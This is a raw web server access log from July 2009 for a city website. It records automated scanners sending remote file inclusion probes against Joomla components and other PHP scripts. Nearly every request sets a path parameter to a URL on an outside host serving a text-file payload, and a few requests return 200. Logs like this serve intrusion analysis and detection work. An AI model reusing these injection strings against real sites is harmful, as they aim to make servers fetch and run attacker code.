114.200.199.144 - - [01/Jul/2009:03:06:18 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:06:18 -0700] "GET /logs/access_080330.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:06:19 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:06:19 -0700] "GET /logs/access_080330.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:03:07:21 -0700] "GET /index.php?p=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:03:07:21 -0700] "GET /logs/index.php?p=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:03:07:21 -0700] "GET /logs/access.log/index.php?p=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:07:50 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:08:06 -0700] "GET /logs/access_080330.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:08:06 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:08:19 -0700] "GET /logs/access_080330.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:09:05 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:09:05 -0700] "GET /logs/access_080330.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:03:11:10 -0700] "GET /logs/access_080330.log//?_zb_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:03:11:10 -0700] "GET /?_zb_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:03:11:10 -0700] "GET /logs//?_zb_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:03:14:52 -0700] "GET /logs////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:03:14:52 -0700] "GET ///components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:03:14:52 -0700] "GET /logs/access_080531.log////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:03:15:58 -0700] "GET /logs/access_080330.log//?_zb_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:03:15:58 -0700] "GET /?_zb_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
208.47.92.61 - - [01/Jul/2009:03:15:58 -0700] "GET /logs//?_zb_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 200 4232 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:03:17:17 -0700] "GET /logs/access.log////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:22:15 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:22:15 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:22:15 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:03:22:17 -0700] "GET /logs/access_080531.log%20%20////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
79.49.190.214 - - [01/Jul/2009:03:22:29 -0700] "GET /logs/access.log%20%20////components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.acesoir.de/cache/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:22:33 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:22:33 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:22:33 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:23:25 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:23:25 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:23:25 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:23:25 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:23:25 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:23:25 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:23:30 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:23:30 -0700] "GET /logs/access.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:23:30 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:23:35 -0700] "GET /logs/access.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:23:52 -0700] "GET /logs/access.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:25:27 -0700] "GET /logs/access.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:25:27 -0700] "GET /logs/access.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:25:32 -0700] "GET /logs/access.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:26:39 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:26:39 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:26:39 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:26:39 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:26:39 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:26:39 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:03:26:39 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:03:26:39 -0700] "GET /logs/access_080531.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:03:26:39 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:28:04 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:28:04 -0700] "GET /logs/access_080531.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:29:24 -0700] "GET /logs/access_081101.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:29:44 -0700] "GET /logs/access_081101.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:32:27 -0700] "GET /logs/access_081101.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:32:28 -0700] "GET /logs/access_081101.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.232.105.116 - - [01/Jul/2009:03:32:36 -0700] "GET /logs/access_081101.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:33:18 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:33:19 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:33:19 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:33:23 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:33:23 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:33:23 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:03:34:38 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:03:34:38 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.122.79.200 - - [01/Jul/2009:03:34:38 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:38:52 -0700] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:38:52 -0700] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:39:40 -0700] "GET /logs/access_080330.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
114.200.199.144 - - [01/Jul/2009:03:39:44 -0700] "GET /logs/access_080330.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kodae.ms.kr///_private/tool/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:03:39:54 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:03:39:54 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.145.31.242 - - [01/Jul/2009:03:43:22 -0700] "GET /logs/access.log%20////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.145.31.242 - - [01/Jul/2009:03:43:22 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt?%0D?? HTTP/1.1" 200 4234 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
218.145.31.242 - - [01/Jul/2009:03:43:22 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt?%0D?? HTTP/1.1" 200 918 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:03:45:16 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 4234 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:03:45:16 -0700] "GET /logs/access.log%20////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:03:45:16 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 918 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:03:49:32 -0700] "GET /logs/access.log%20////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:03:49:32 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 918 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
222.73.17.7 - - [01/Jul/2009:03:49:32 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dfpyvu.mxl.uabc.mx/trash/perkosa.txt??? HTTP/1.1" 200 4234 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:03:49:32 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:03:49:32 -0700] "GET /include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:03:49:32 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:03:49:33 -0700] "GET /logs/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:03:49:33 -0700] "GET /include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:03:49:33 -0700] "GET /logs/access.log/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
62.140.23.185 - - [01/Jul/2009:03:51:53 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.140.23.185 - - [01/Jul/2009:03:51:53 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
62.140.23.185 - - [01/Jul/2009:03:51:53 -0700] "GET /logs/access_081101.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:03:55:34 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.98.209.71 - - [01/Jul/2009:03:56:33 -0700] "GET /logs/access.log%20%20/include/lib.inc.php?site_path=http://www.aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "cityofarkadelphia.com"
124.0.136.1 - - [01/Jul/2009:03:57:15 -0700] "GET /logs/access_080531.log//bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
124.0.136.1 - - [01/Jul/2009:03:57:15 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
124.0.136.1 - - [01/Jul/2009:03:57:15 -0700] "GET /bemarket/postscript/postscript.php?p_mode=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:03:59:10 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:03:59:11 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:03:59:11 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:03:59:15 -0700] "GET /logs/scripts.log//include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.172.22.2 - - [01/Jul/2009:03:59:15 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.702com.net/images/noo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
